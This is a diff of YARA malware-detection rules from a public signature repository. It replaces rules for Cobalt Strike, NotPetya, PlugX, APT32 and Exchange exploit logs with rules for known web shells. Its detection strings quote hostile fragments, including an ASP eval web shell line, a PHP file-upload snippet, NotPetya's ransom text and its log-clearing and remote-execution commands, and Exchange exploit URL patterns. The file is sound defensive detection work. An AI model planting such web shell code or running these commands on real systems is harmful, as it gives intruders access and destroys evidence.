-		id = "63b71eef-0af5-5765-b957-ccdc9dde053b"
-		date = "2021-03-16"
-		modified = "2023-12-05"
-		reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L90-L102"
+		description = "Web Shell - file ice.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L292-L305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8685b1626c8d263f49ccf129dcd4fe1b42482fcdb37c2e109cedcecaed8c2407"
-		score = 75
+		hash = "6560b436d3d3bb75e2ef3f032151d139"
+		logic_hash = "d92cc9ac8630b40f23b9ff7cda5a237b4885d30de4b9b497be7512e7eb020a09"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a_x64 = {4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03}
-		$a_x86 = {8B 46 04 8B 08 8B 50 04 83 C0 08 89 55 08 89 45 0C 85 C9 75 04 85 D2 74 23 3B CA 73 E6 8B 06 8D 3C 08 33 D2}
+		$s0 = "<%eval request(\"ice\")%>" fullword
 
 	condition:
-		any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Win_Cobaltstrike : COMMODITY
+rule SIGNATURE_BASE_Webshell_Cihshell_Fix
 {
 	meta:
-		description = "The CobaltStrike malware family."
-		author = "threatintel@volexity.com"
-		id = "113ba304-261f-5c59-bc56-57515c239b6d"
-		date = "2021-05-25"
-		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike.yar#L104-L122"
+		description = "Web Shell - file cihshell_fix.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L306-L320"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b041efb8ba2a88a3d172f480efa098d72eef13e42af6aa5fb838e6ccab500a7c"
-		logic_hash = "1e8a68050ff25f77e903af2e0a85579be1af77c64684e42e8f357eee4ae59377"
-		score = 75
+		hash = "3823ac218032549b86ee7c26f10c4cb5"
+		logic_hash = "59ae76d6828d8c0ddcbafa19063e6dcf25c826386f46df2b8f9674b628365a2b"
+		score = 70
 		quality = 85
-		tags = "COMMODITY"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s (admin)" fullword
-		$s2 = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 2D 73 74 72 65 61 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A 0D 0A 00}
-		$s3 = "%02d/%02d/%02d %02d:%02d:%02d" fullword
-		$s4 = "%s as %s\\%s: %d" fullword
-		$s5 = "%s&%s=%s" fullword
-		$s6 = "rijndael" fullword
-		$s7 = "(null)"
+		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
+		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CVE_2014_4076_Exploitcode : CVE_2014_4076 FILE
+rule SIGNATURE_BASE_Webshell_Asp_Shell
 {
 	meta:
-		description = "Detects an exploit code for CVE-2014-4076"
+		description = "Web Shell - file shell.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "83563dea-63d9-58a9-82ed-275455122571"
-		date = "2018-04-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/yarGen"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2014_4076.yar#L2-L18"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L321-L335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "96b8743de8b3968d64b74af93f5e61574a3b31d33df6d51e944b4f02c7b9723e"
-		score = 75
+		hash = "e63f5a96570e1faf4c7b8ca6df750237"
+		logic_hash = "5cc698e4ff23ca296b339589d12c24e67c99272e73445604a4552d3023e19636"
+		score = 70
 		quality = 85
-		tags = "CVE-2014-4076, FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "44690af85efef2db04c7e8cba7ca0d0e53be1a1432a339570a7d26eec860b8ee"
 
 	strings:
-		$x1 = "[+] Created a new cmd.exe process" fullword ascii
-		$x2 = "[+] Modified shellcode" fullword ascii
-		$x3 = "[*] Spawning SYSTEM shell..." fullword ascii
-		$x4 = "[*] MS14-070 (CVE-2014-4076) x86" fullword ascii
+		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
+		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_Exchange_Proxynotshell_Patterns_CVE_2022_41040_Oct22_1 : SCRIPT
+rule SIGNATURE_BASE_Webshell_Private_I3Lue
 {
 	meta:
-		description = "Detects successful ProxyNotShell exploitation attempts in log files (attempt to identify the attack before the official release of detailed information)"
+		description = "Web Shell - file Private-i3lue.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2812fcd-0a20-5bbd-a9e1-9cca1ed58aa3"
-		date = "2022-10-11"
-		modified = "2023-03-15"
-		old_rule_name = "EXPL_Exchange_ProxyNoShell_Patterns_CVE_2022_41040_Oct22_1"
-		reference = "https://github.com/kljunowsky/CVE-2022-41040-POC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2022_41040_proxynoshell.yar#L2-L26"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L336-L349"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "81b0f0fea2762beb47826ff95545c87e960e098b9d5f45eacfe07b3ecf319ac5"
-		score = 75
-		quality = 60
-		tags = "SCRIPT"
+		hash = "13f5c7a035ecce5f9f380967cf9d4e92"
+		logic_hash = "274586f2c451eda45c3a52b615961dbba806f8d25e34cc358e661fcfd1143d08"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}owershell/ nocase ascii
-		$sa1 = " 200 "
-		$fp1 = " 444 "
-		$fp2 = " 404 "
-		$fp2b = " 401 "
-		$fp3 = "GET /owa/ &Email=autodiscover/autodiscover.json%3F@test.com&ClientId=" ascii
-		$fp4 = "@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" ascii
+		$s8 = "case 15: $image .= \"\\21\\0\\"
 
 	condition:
-		$sr1 and 1 of ( $sa* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_Notpetya_Ransomware_Jun17 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Up
 {
 	meta:
-		description = "Detects new NotPetya Ransomware variant from June 2017"
+		description = "Web Shell - file up.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8805f971-0680-534d-9955-65dc4ecc934a"
-		date = "2017-06-27"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/h6iaGj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nopetya_jun17.yar#L12-L41"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L350-L365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e49fd918e9cc09a60434e62767794cd908f195cb71fd7a752a2b4802973bc92e"
-		score = 75
+		hash = "7edefb8bd0876c41906f4b39b52cd0ef"
+		logic_hash = "22f444ce4068f46c0b57e566faca0c6377346e403de592b0e51869781fda31a9"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
-		hash2 = "45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0"
-		hash3 = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"
 
 	strings:
-		$x1 = "Ooops, your important files are encrypted." fullword wide ascii
-		$x2 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1 " fullword wide
-		$x3 = "-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 " fullword wide
-		$x4 = "Send your Bitcoin wallet ID and personal installation key to e-mail " fullword wide
-		$x5 = "fsutil usn deletejournal /D %c:" fullword wide
-		$x6 = "wevtutil cl Setup & wevtutil cl System" ascii
-		$x7 = { 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E
-         00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 }
-		$s1 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\" " fullword wide
-		$s4 = "\\\\.\\pipe\\%ws" fullword wide
-		$s5 = "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d" fullword wide
-		$s6 = "u%s \\\\%s -accepteula -s " fullword wide
-		$s7 = "dllhost.dat" fullword wide
+		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
+		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
+		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Proxytoken_Exploitation_Aug21_1 : CVE_2021_33766
+rule SIGNATURE_BASE_Webshell_Mysql_Interface_V1_0
 {
 	meta:
-		description = "Detects ProxyToken CVE-2021-33766 exploitation attempts on an unpatched system"
+		description = "Web Shell - file Mysql interface v1.0.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4840140-6d31-52f9-b1a0-2acdd4b955cd"
-		date = "2021-08-30"
-		modified = "2023-12-05"
-		reference = "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2021_33766_proxytoken.yar#L2-L21"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L366-L379"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ff0c3e4f7491f5faec3e2688819ea5ec636a7d4eb57941afff6f53f60b0c0293"
-		score = 75
+		hash = "a12fc0a3d31e2f89727b9678148cd487"
+		logic_hash = "baa938c4cfd2c46b1752d866e186d76a04c353617d8ec3e0d78a3c546b120d13"
+		score = 70
 		quality = 85
-		tags = "CVE-2021-33766"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ss0 = "POST " ascii
-		$ss1 = " 500 0 0"
-		$sa1 = "/ecp/" ascii
-		$sa2 = "/RulesEditor/InboxRules.svc/NewObject" ascii
-		$sb1 = "/ecp/" ascii
-		$sb2 = "SecurityToken=" ascii
+		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
 
 	condition:
-		all of ( $ss* ) and ( all of ( $sa* ) or all of ( $sb* ) )
+		all of them
 }
-
-rule SIGNATURE_BASE_EXT_APT32_Goopdate_Installer
+rule SIGNATURE_BASE_Webshell_Php_S_U
 {
 	meta:
-		description = "Detects APT32 installer side-loaded with goopdate.dll"
-		author = "Facebook"
-		id = "08f3cbda-ccb7-517a-b205-5f71de26c735"
-		date = "2021-02-25"
-		modified = "2023-12-05"
-		reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt32.yar#L3-L20"
+		description = "Web Shell - file s-u.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L380-L393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "69730f2c2bb9668a17f8dfa1f1523e0e1e997ba98f027ce98f5cbaa869347383"
-		logic_hash = "1dcb3009c5c19ff4e54d82d3a4b99b3431e78664f1660522a781e815d96958c4"
-		score = 75
+		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
+		logic_hash = "3c6904fa475784e737275fd47eabea077bed57e920071c68fa09f7defecbdb72"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = { 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? }
-		$s1 = "GetProcAddress"
-		$s2 = { 8B 4D FC ?? ?? 0F B6 51 0C ?? ?? 8B 4D F0 0F B6 1C 01 33 DA }
-		$s3 = "FindNextFileW"
-		$s4 = "Process32NextW"
+		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
 
 	condition:
-		(pe.is_64bit ( ) or pe.is_32bit ( ) ) and all of them
+		all of them
 }
-rule SIGNATURE_BASE_EXT_APT32_Osx_Backdoor_Loader : FILE
+rule SIGNATURE_BASE_Webshell_Phpshell_2_1_Config
 {
 	meta:
-		description = "Detects APT32 backdoor loader on OSX"
-		author = "Facebook"
-		id = "ac313bd8-bf15-5b72-b651-35015f71dd90"
-		date = "2021-02-25"
-		modified = "2023-12-05"
-		reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt32.yar#L22-L49"
+		description = "Web Shell - file config.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L394-L407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "768510fa9eb807bba9c3dcb3c7f87b771e20fa3d81247539e9ea4349205e39eb"
-		logic_hash = "26964f95a9298b838e06fb9d7f739c8b87a976d8da7fb08416e952d26e84b84e"
-		score = 75
+		hash = "bd83144a649c5cc21ac41b505a36a8f3"
+		logic_hash = "51d16bcaef5f6795ebcd1154dca79d5cf5a389948b0e59f4939c30fef877e816"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = { 00 D2 44 8A 04 0F 44 88 C0 C0 E8 07 08 D0 88 44 0F FF 48 FF C1 48 83 F9 10 44 88 C2 }
-		$a2 = { 41 0F 10 04 07 0F 57 84 05 A0 FE FF FF 41 0F 11 04 07 48 83 C0 10 48 83 F8 10 75 }
-		$e1 = { CA CF 3E F2 DA 43 E6 D1  D5 6C D4 23 3A AE F1 B2 }
-		$e2 = "MlkHVdRbOkra9s+G65MAoLga340t3+zj/u8LPfP3hig="
-		$e3 = { 5A 69 98 0E 6C 4B 5C 69  7E 19 34 3B C3 07 CA 13 }
-		$e4 = "1Sib4HfPuRQjpxIpECnxxTPiu3FXOFAHMx/+9MEVv9M+h1ngV7T5WUP3b0zsg0Qd"
-		$e5 = "_ArchaeologistCodeine"
-		$e6 = "_PlayerAberadurtheIncomprehensible"
+		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
 
 	condition:
-		(( uint32( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedface ) or ( uint32( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xfeedfacf ) ) and ( 2 of ( $e* ) or all of ( $a* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Plugx_J16_Gen : FILE
+rule SIGNATURE_BASE_Webshell_Asp_EFSO_2
 {
 	meta:
-		description = "Detects PlugX Malware samples from June 2016"
+		description = "Web Shell - file EFSO_2.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "13ef1e80-7090-5a1e-bca7-8d3de0dc2247"
-		date = "2016-06-08"
-		modified = "2023-12-05"
-		reference = "VT Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_win_plugx.yar#L10-L40"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L408-L421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3e988243663264b2647e098e36b83dd675141fa9765c9bd47c30f29bf176cd8f"
-		score = 75
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+		logic_hash = "19bd00fabe0b4695129c180dd145e757e0b2c2a6dad751e8c889222c191e03ce"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "%WINDIR%\\SYSTEM32\\SERVICES.EXE" fullword wide
-		$x2 = "\\\\.\\PIPE\\RUN_AS_USER(%d)" fullword wide
-		$x3 = "LdrLoadShellcode" fullword ascii
-		$x4 = "Protocol:[%4s], Host: [%s:%d], Proxy: [%d:%s:%d:%s:%s]" fullword ascii
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\User Agent\\Post Platform" fullword wide
-		$s2 = "%s\\msiexec.exe %d %d" fullword wide
-		$s3 = "l%s\\sysprep\\CRYPTBASE.DLL" fullword wide
-		$s4 = "%s\\msiexec.exe UAC" fullword wide
-		$s5 = "CRYPTBASE.DLL" fullword wide
-		$s6 = "%ALLUSERSPROFILE%\\SxS" fullword wide
-		$s7 = "%s\\sysprep\\sysprep.exe" fullword wide
-		$s8 = "\\\\.\\pipe\\a%d" fullword wide
-		$s9 = "\\\\.\\pipe\\b%d" fullword wide
-		$s10 = "EName:%s,EAddr:0x%p,ECode:0x%p,EAX:%p,EBX:%p,ECX:%p,EDX:%p,ESI:%p,EDI:%p,EBP:%p,ESP:%p,EIP:%p" fullword ascii
-		$s11 = "Mozilla/4.0 (compatible; MSIE " fullword wide
-		$s12 = "; Windows NT %d.%d" fullword wide
-		$s13 = "SOFTWARE\\Microsoft\\Internet Explorer\\Version Vector" fullword wide
-		$s14 = "\\bug.log" wide
+		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 8 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Plugx_J16_Gen2 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Up
 {
 	meta:
-		description = "Detects PlugX Malware Samples from June 2016"
+		description = "Web Shell - file up.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "28e9cbb9-cd60-555d-b033-4e2bf293adf2"
-		date = "2016-06-08"
-		modified = "2023-12-05"
-		reference = "VT Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_win_plugx.yar#L42-L62"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L422-L435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8fbe90cbff5d408d26b0a5ace6833a0e3100d11ff544184d9ccc2f39ee806de9"
-		score = 75
+		hash = "515a5dd86fe48f673b72422cccf5a585"
+		logic_hash = "77c8121d000c45e44717689dec535fde7c9722005d1e4ff40d0b84abcf289f47"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "XPlugKeyLogger.cpp" fullword ascii
-		$s2 = "XPlugProcess.cpp" fullword ascii
-		$s4 = "XPlgLoader.cpp" fullword ascii
-		$s5 = "XPlugPortMap.cpp" fullword ascii
-		$s8 = "XPlugShell.cpp" fullword ascii
-		$s11 = "file: %s, line: %d, error: [%d]%s" fullword ascii
-		$s12 = "XInstall.cpp" fullword ascii
-		$s13 = "XPlugTelnet.cpp" fullword ascii
-		$s14 = "XInstallUAC.cpp" fullword ascii
+		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Scarcruft_Malware_Feb18_1 : FILE
+rule SIGNATURE_BASE_Webshell_Networkfilemanagerphp
 {
 	meta:
-		description = "Detects Scarcruft malware - February 2018"
-		author = "Florian rootpath"
-		id = "43a87f2a-cf60-5035-8d40-c360a789a1ac"
-		date = "2018-02-03"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/craiu/status/959477129795731458"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_scarcruft.yar#L2-L15"
+		description = "Web Shell - file NetworkFileManagerPHP.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L436-L449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa1ed130518a2096bd731dce917512d560160e271ad8f0ccd57fbedd478a5502"
-		score = 90
+		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
+		logic_hash = "235e4062a9b9ebdf7dd0b8a2cb3b16ba7688a75b90d8c527344cf9605304838d"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "d:\\HighSchool\\version 13\\2ndBD\\T+M\\" ascii
-		$x2 = "cmd.exe /C ping 0.1.1.2" wide
+		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_Windowsinstaller_Call_Feb22_1 : FILE
+rule SIGNATURE_BASE_Webshell_Server_Variables
 {
 	meta:
-		description = "Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts."
-		author = "Nils Kuhnert"
-		id = "8f2e8f91-74e0-5574-9c0a-1479d6114212"
-		date = "2022-02-26"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/threatinsight/status/1497355737844133895"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_maldoc.yar#L1-L16"
+		description = "Web Shell - file Server Variables.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L450-L464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "279182487ab7d35264adfbd0d122ee7634cd92ae1711de78ec7f20928df34f49"
-		score = 65
+		hash = "47fb8a647e441488b30f92b4d39003d7"
+		logic_hash = "2a85301f1d6e4c457ff0a1b2a08eb6f054905993a0667087f37b9a7352e38911"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		tlp = "white"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "WindowsInstaller.Installer$"
-		$ = "CreateObject"
-		$ = "InstallProduct"
+		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
+		$s9 = "Variable Name</B></font></p>" fullword
 
 	condition:
-		uint32be( 0 ) == 0xd0cf11e0 and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Gen_Trojan_Mikey : FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Ice_2
 {
 	meta:
-		description = "Trojan Mikey - file sample_mikey.exe"
+		description = "Web Shell - file ice.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff875436-4fed-5f20-a0a5-bfd146d93499"
-		date = "2015-05-07"
-		modified = "2023-12-05"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mikey_trojan.yar#L2-L21"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L465-L478"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a8e6c3ca056b3ff2495d7728654b780735b3a4cb"
-		logic_hash = "5454953bba09d6fc866bcb23ef81a0b6763d8f82b8b606597548cbb5cf6053ed"
+		hash = "1d6335247f58e0a5b03e17977888f5f2"
+		logic_hash = "57c3c369abd826d676290300d8df2d890b777fa1f0e1156654062159a4228db7"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
